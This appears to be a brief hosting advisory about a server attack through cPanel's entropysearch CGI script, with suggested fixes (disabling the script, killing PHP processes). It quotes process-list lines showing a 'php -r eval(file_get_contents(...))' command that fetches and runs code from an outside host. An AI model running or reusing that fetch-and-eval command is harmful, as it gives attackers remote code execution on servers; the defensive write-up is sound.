Hack Attempt via entropysearch CGI script

If you have noticed server loaded and following process running on your server Be alert!!  Something WRONG going on on  your server

 


877082 aatwdhh  20   0  332m 3232  520 R 45.9  0.0 105:23.78 php -r eval(file_get_contents(‘http://hello. hacked. jp/hello/n.php?a=207589788&b=26786093&u=
750767 coavjuwv3  20   0  332m 6308  512 R 45.5  0.1 391:25.41 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=683074642&b=88133019&u= o
859849 anafcte  20   0  332m 7900  512 R 45.5  0.1 126:15.42 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=387327366&b=49975220&u=  .
939351 baavgfmor  20   0  332m  16m 9960 R 44.8  0.2   3:57.21 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=252084665&b=32527086&u=
928864 bqcagom     20   0  332m 7928  548 R 43.6  0.1   9:23.19 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=960742077&b=123956558&u= cgi-
818841 alasdeno  20   0  332m 6588  504 R 42.9  0.1 255:40.30 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=888691102&b=114660873&u=al-


 

You need to get it deal as soon as possible. Fast solution would be disable the entropysearch by login into your server as root and run below command

 

#chmod 000 /usr/local/cpanel/cgi-sys/entropysearch.cgi

 

And kill all php process using killall -9 php

The load will be normal as soon as you performed above steps, we suggest you to get your server scan and get firewall level higher.